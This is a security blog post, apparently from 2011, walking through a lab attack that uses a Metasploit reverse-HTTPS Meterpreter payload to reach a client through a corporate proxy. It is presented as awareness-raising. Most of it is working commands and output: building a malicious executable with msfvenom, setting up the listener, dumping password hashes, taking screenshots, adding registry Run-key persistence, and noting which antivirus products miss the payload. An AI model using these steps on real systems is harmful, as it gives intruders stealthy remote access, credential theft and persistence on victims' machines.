SECURITY BREACHES, SECURITY NEWS, SECURITY RESEARCH, TOOLS |

Backdoor Corporate Networks with Metasploit

HD Moore announced a new post exploitation tool offering Meterpreter sessions over HTTPS (HTTP) that will traverse the corporate proxy. Variations on this have been available previously but have been for a number of reasons been not so stable.

The purpose of this post is to raise awareness. Many IT folks are comfortable with a firewall, regular patching and antivirus. All good right?

Introduction

Let's first look at a common locked down Corporate Network. Then we will show how pwnage is not difficult with this new Payload.

Lab Setup

I am simulating the network with 3 virtual guest machines and the host Ubuntu Linux system. 1 virtual guest will act as the Firewall and Proxy, while the 2 other guests are Windows clients that will be the targets. The laptop host in this lab is the attacker on the Internet.

System Operating System IP Address
Laptop 4gb ram running VirtualBox Ubuntu 11.04 Host Only Networking: 192.168.56.1
Linux Gateway
guest1
Smoothwall with Proxy and Outbound Firewall Rules Host Only Network: 192.168.56.101
Host Only Network2: 10.10.10.1
Windows Victim1
guest2
Windows XP Service Pack 3
no additional patches
Host Only Network2: 10.10.10.199
Windows Victim2
guest3
Windows 7 Enterprise
fully patched
Host Only Network2: 10.10.10.198

On the virtual gateway Smoothwall box I configured DHCP, Proxy, Snort and Firewall Rules to block outbound traffic. Only opened 22 (for sftp) and proxy port (tcp 800). This has simulated the corporate network in the diagram above.

Build the malicious exe

Now build the malicious executable.

In this test we are building an exe to launch the Payload. Code execution on the client host could be accomplished in many ways, exploitation via social engineering, emailed links with malicious java applets, client based exploits etc.

On the Laptop I am running Metasploit Framework 3.7.2.

/opt/framework-3.7.2/msf3# msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=192.168.56.1 LPORT=443 > evil_https.exe

Listen

Now to setup the listener on the laptop.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler...
msf exploit(handler) >

Use scp or whatever to copy evil_https.exe to the Windows XP system and then run it.

Back in the console on the Linux host we see.

[*] 192.168.56.101:43681 Request received for /INITM...
[*] 192.168.56.101:43681 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:43681) at Fri Jul 15 12:09:01 +1000 2011

meterpreter > hashdump
Administrator:500:aad3b435b51404eexad3e435t51404ee:31d6cse0dfe6ae931b73c5ed7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:e4c292ecc2957ce7fb630fc6166aa510:235f3388ca0a29e8494d047362de1507:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c77865e3c4b213df710209775e335e62:::

evil_https.exe connected to the listener on Laptop. All communication took place over the proxy. Looking at netstat on the client XP machine we only see HTTPS connections to the proxy. A very normal type of connection.

How solid is the connection? Lets reboot the smoothwall proxy host.

Meterpreter session appears to hang during the reboot. Type a command; wait.... success!! The session over the proxy using HTTPS is re-established. I did not have to re-run executable.

meterpreter > ipconfig

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 08:00:27:70:63:0d
IP Address : 10.10.10.199
Netmask : 255.255.255.0

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

meterpreter > screenshot
Screenshot saved to: /opt/framework-3.7.2/msf3/bFjkdUHa.jpeg

Persistent

Lets improve things and make it persistent on the client so that when the corporate user takes his laptop home we get a session from home, and then another session the next morning from the corporate network.

These commands manipulate the registry and will add evil_https.exe to the start-up programs on the client XP machine.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (1):

VBoxTray

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v evil -d 'C:\windows\evil_https.exe'
Successful set evil.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (3):

VBoxTray
evil

meterpreter >

Next I rebooted Windows XP and we received a new session on the listener after the reboot.

msf exploit(handler) >
[*] 192.168.56.101:55182 Request received for /INITM...
[*] 192.168.56.101:55182 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:55182) at Fri Jul 15 12:43:31 +1000 2011

Nice, now as mentioned in the release blog post it should also be possible to quit out of the metasploit console and re-establish a session without touching the WinXP box.

I quit from Metasploit Console. Went and had some lunch.

Ok, after a great lunch I fired up the msfconsole using the same settings as before. I do not touch the XP machine.

/opt/framework-3.7.2/msf3# ./msfconsole

| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 711 exploits - 360 auxiliary - 58 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13116 updated 8 days ago (2011.07.07)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler...
msf exploit(handler) >
[*] 192.168.56.101:40252 Request received for /CONN_pJGJgpWGAzUlDCTZ/...
[*] Incoming orphaned session CONN_pJGJgpWGAzUlDCTZ, reattaching...
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:40252) at Fri Jul 15 13:57:34 +1000 2011

Wow, that is nice the client machine reconnected. This new payload is stable and undeniably dangerous.

Righto, same deal on fully patched Windows7 Enterprise with "Work Network Settings" (no Anti-Virus).

meterpreter >
[*] 192.168.56.101:50910 Request received for /INITM...
[*] 192.168.56.101:50910 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:50910) at Fri Jul 15 14:22:07 +1000 2011

meterpreter >
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC: 08:00:27:ef:f4:61
IP Address : 10.10.10.198
Netmask : 255.255.255.0

meterpreter > sysinfo
System Language : en_AU
OS : Windows 7 (Build 7600).
Computer : TEST-VM2
Architecture : x86
Meterpreter : x86/win32
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Checking DEP Support Policy...
meterpreter >

Success!

Note that both the client systems were not running any Anti-virus. The executable may have been blocked if they were.

Lets check virustotal.com. Remember this is a vanilla payload from msfvenom. I have not used exe templates or attempted additional tricks to avoid Anti-virus detection.

Quite a few anti-virus programs detected the executable as dangerous (27 out of 43). Let's have a closer look at corporate favourites like Symantec and Trend.

Symantec and Trend did not detect the executable as dangerous.

Corporate Networks face a serious threat from this type of attack. The attack traffic is wrapped in SSL so filtering will not see much unless you are decrypting at the proxy, which for most organizations is unlikely.

Conclusion

By understanding the attack you can then start to discuss and find effective ways to defend against these types of targeted attacks.